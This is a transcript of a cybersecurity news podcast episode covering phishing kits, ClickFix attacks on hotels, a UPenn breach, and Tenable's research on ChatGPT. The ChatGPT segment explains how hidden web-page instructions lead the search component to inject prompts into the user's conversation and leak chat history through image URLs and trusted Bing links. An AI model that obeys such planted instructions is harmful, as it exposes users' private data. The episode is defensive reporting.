Transcript
A (0:00)
Cybersecurity Today would like to thank Meter for their support in bringing you this podcast. Meter delivers a complete networking stack, wired, wireless and cellular in one integrated solution that's built for performance and scale. You can find them at meter.com CST.
B (0:19)
New industrial fishing kit quantum root redirect active in 90 countries large scale Click Fix Phishing attacks target hotel Systems research trick ChatGPT into prompt injecting itself and UPENN confirms massive data breach following hack this is Cybersecurity Today and I'm your host David Shipley. Let's get started. There's a new phishing as a service platform making waves on the cybercrime scene, and it's helping change the game in the attacker's favor. It's called Quantum Root Redirect or qrr. And according to Bleeping Computer, it's a fully automated phishing engine using roughly domains to steal Microsoft 365 credentials. What makes QRR so dangerous isn't just the sheer scale of it. It's the level of automation and sophistication built right in. This thing handles every stage of a phishing attack automatically, from sending the fake emails to rerouting victims to multiple domains, stealing credentials, and even tracking results on a dashboard. It's a phishing factory in a box. Here's how it works. The attack starts with an email that looks perfectly normal. A docusign request, a payment alert, maybe a missed voicemail or a QR code. But when you click or scan the link, it doesn't just take you straight to a Microsoft login page. Instead, QRR quietly reroutes you through a network of compromised domains, filtering who or what gets through. If the system detects a real person, it redirects them to the phishing landing page. If it detects an automated scanner like the kind used by email security tools, it sends those somewhere harmless, like a legitimate website. That means many security tools never get to see the malicious content. This is phishing automation built at scale to beat email defense automation at scale. The criminals behind QRR even track their campaign performance in real time, watching which targets are human, which are bots, and which messages are getting the most reaction. Since August, QRR attacks have been seen in more than 90 countries, with nearly three quarters of those attacks targeting users in the United States. And QRR isn't alone. It's part of a growing ecosystem of industrialized phishing services with names like Void Proxy, Darkoola, Morphing, Meerkat, and Tycoon 2fa, all designed to make cybercrime faster, cheaper, and easier to scale. So what's the takeaway here? Phishing isn't just getting more creative, it's getting even more automated. The days of handcrafted scams dominating phishing are clearly over, and we're in the era of data driven, globally distributed platforms that can outmaneuver traditional defenses. And that means organizations have to continue to evolve as well. Layered defenses matter a lot. Email filters are still important, but also active monitoring for compromised accounts and above all, continuing to build a culture of security with awareness and behavior programs to help people spot and stop threats. A new and highly targeted phishing campaign is hitting the hospitality industry, According to the Hacker News, Cybercriminals are using a click fix style attack to trick hotel managers into installing malware known as Pure Rat, giving attackers full remote access to their systems and booking accounts. Here's how it works. The campaign starts with a compromised email account, often from another hotel, sending what looks like a legitimate booking.com message to managers at other properties. The email includes a link that appears to be a security verification step, supposedly to, quote, confirm your connection or validate your booking.com credentials. Clicking that link starts a chain of redirects that leads to a fake page posing as a security check, complete with a recaptcha window to make it look authentic. But here's where the social engineering style known as click fix comes in. The page tells the targeted user to copy and paste a PowerShell command to verify their system. What that command actually does is download a zip file containing a malicious binary, one that sets up persistence on the machine and loads the Pure RAT malware through DLL side loading. Once installed, Pure RAT can do almost anything capture keystrokes, take over webcams and microphones, filtrate data, and even act as a proxy for further attacks. And the threat doesn't stop there. After stealing credentials from hotel systems, these attackers log into booking platforms like booking.com or Expedia, using the access to target real hotel guests. Victims have reported receiving fake emails and WhatsApp messages that appear to come from legitimate hotels, complete with real reservation details. The messages warn that their booking could be canceled unless they reconfirm their credit card information. That link, of course, leads to a phishing page that steals their payment data. This campaign has been active since at least April and continues to evolve. Researchers have even found threat actors on Telegram openly buying and selling booking.com administrator accounts either as cookies or login credentials harvested from previous infections. The trade is surprisingly structured. One actor calling themselves ModeratorBooking even runs a booking log verification service promising to check stolen credentials within 24 to 48 hours. The tools to do this readily available on cybercrime forums for as little as $40. All of this underscores a troubling trend. The industrialization of cybercrime continues apace. Every step of this attack chain, from credential theft to malware delivery to resale and monetization, now operates as a service. And that means smaller, less skilled threat actors can participate in sophisticated campaigns without ever learning to write a line of code. The latest twist in this click fix style attack includes video instructions, countdown timers, and even fake user verification counters. Designed to make the phishing page look even more legitimate, the pages now adapt dynamically to the victim's operating system, showing Windows users how to open the run command and Mac users how to open the terminal, even automatically copying the malicious command to the clipboard. It's all about lowering the friction and increasing trust, the same psychological manipulation that makes social engineering so effective in general. The big takeaway here? No industry is immune from the professionalization of phishing. And when social engineering meets this kind of automation, even trained users can be tricked into doing the attacker's work for them. The key here is to make sure that you make them as resilient as possible, but also, if they do realize they fell victim, to make sure they feel motivated to report it. For the hospitality sector, where customer trust is everything, these attacks aren't just about stealing money, they're stealing your reputation. As we rush to adopt AI everywhere, all the time, researchers keep finding some of the same old problems. These systems can be incredibly powerful, but they're still so easily manipulated. According to CSO Online Security, researchers at Tenable have discovered seven new ways attackers could extract private data from ChatGPT chat histories, largely through indirect prompt injection attacks that exploit the chatbot's own built in features, these vulnerabilities were found in the latest GPT5 model, and while some have been patched, others still work. It's the latest reminder that AI isn't immune to classic security issues. In fact, they seem to be coming with more than their fair share. And if anything, these new technologies are just reinventing old problems in more complex, layered ways. Here's how this particular attack works. When ChatGPT searches the web or opens a link, it uses a separate system called SearchGPT to visit and summarize web pages. Attackers realize they could hide malicious instructions inside a website's code, maybe in a blog comment, or classically using invisible text, so that when SearchGPT reads that page, it unknowingly picks up on those hidden commands. That's the first step. The second step is what Tenable calls a conversation injection. That's when hidden commands tell SearchGPT to inject another command directly into the user's ChatGPT conversation, tricking ChatGPT into prompt injecting itself. Once that happens, attackers could potentially get access to private information from the user's chat history, things like prior messages or stored context. But how do they get that stolen data out? Tenable found a surprisingly creative way. By exploiting how ChatGPT renders markdown text, including image links, an attacker could encode letters as image URLs and monitor which images the chatbot tries to load, allowing them to reconstruct its hidden response one letter at a time. 10 points for cleverness on that one. It's messy, it's slow, but it works. OpenAI uses a safeguard called Urlsafe to block suspicious links. But unsurprisingly, Tenable found that Bing tracking URLs can slip through those filters because Bing's domain is implicitly trusted. Even more concerning, because ChatGPT now has long term memory, attackers could in theory ask it to remember those malicious prompts, making the exploit persistent across feature chats. Tenable calls this a quote, perfect storm scenario. And while OpenAI has fixed some of the issues, others remain AI does not understand intent. It just follows instructions and in the wrong context. That obedience can and will be weaponized. The larger lesson here is clear, particularly when it comes to AI in the browser, they are not ready for prime time. Regardless of whether you're using it personally or professionally, these tools can contain massive risk. And always think critically about the outputs of AI and the access AI has to your systems. These companies are so eager to rush new technologies out, they aren't thinking through security. Clearly, you have to. The University of Pennsylvania has confirmed that hackers stole data from its systems at the end of October, after sending taunting emails from official university addresses to alumni and staff. Penn had dismissed those emails as fraudulent. But as TechCrunch reported, the university later confirmed the breach was real. As people noted the messages came from legitimate PEN email accounts. Attackers gained access to pen systems tied to alumni and donor records, sent out offensive messages, and stole data before systems were secured. The attackers have alleged they gained more than 1.2 million people's personal information. A UPENN graduate has now filed the first of what will likely be many class action lawsuits claiming the school failed to protect personal information after the hack. According To Penn, the breach began with a social engineering attack. That's concerning enough, But a detail in TechCrunch's reporting raises some even more serious questions about Penn's approach to security. A university employee anonymously told TechCrunch that while Penn requires multi factor authentication, or MFA, some high ranking officials were granted exemptions. Now, we don't know yet whether those exemptions were connected to this particular attack. PEN hasn't said whether the compromised account belonged to someone who was not using mfa. But the very existence of those exemptions should make every organization take a hard look at its own practices. Because when leadership exempts itself from security controls, it doesn't just create a huge target on them and a risk for the organization, it creates a culture of double standards. It tells everyone in an organization that cybersecurity is optional if you're important enough. And that's dangerous, regardless of what kind of organization you are. If these MFA exceptions were a part of this breach, they raise additional risks for pen. Cyber Insurance Coverage Here's a cautionary tale. Earlier this year, the city of Hamilton in Ontario, Canada, learned this lesson the hard way. Its $5 million cyber insurance claim was denied after a ransomware attack because the city had not fully implemented Multi Factor Authentication across all of its systems, despite knowing it was required to do so under its policy. In other words, the insurer walked away because Hamilton didn't meet its obligations. If Penn or any other organization knowingly exempts senior officials or others from mfa, it's not just inviting attackers to take a run at them. It may also be inviting its insurer to walk away when it matters the most. So even if MFA exemptions seem like a small administrative accommodation, they carry massive governance, culture and financial implications. This breach is another reminder that cybersecurity is not just a technical issue, it is a leadership issue. The standards leaders set for themselves define the standards everyone else will follow, and the research we've done at Boseron shows people care about this. Organizations where people think their senior leaders care, they talk the talk and walk the walk. They have lower phishing click rates, I.e. they're less risky. Make sure that your organization is one of those where people believe senior leaders care and do act in a secure way. You can contact us@technewsday.com or leave a comment under the YouTube video. Please help us spread the word. Like subscribe or consider leaving a review. And if you enjoy the show, please tell others. We've seen our audience grow because of your help and we're grateful for it. We'd love to continue to grow our audience and we still need your help. I've been your host. David Shipley. Jim Love will be back on Friday.
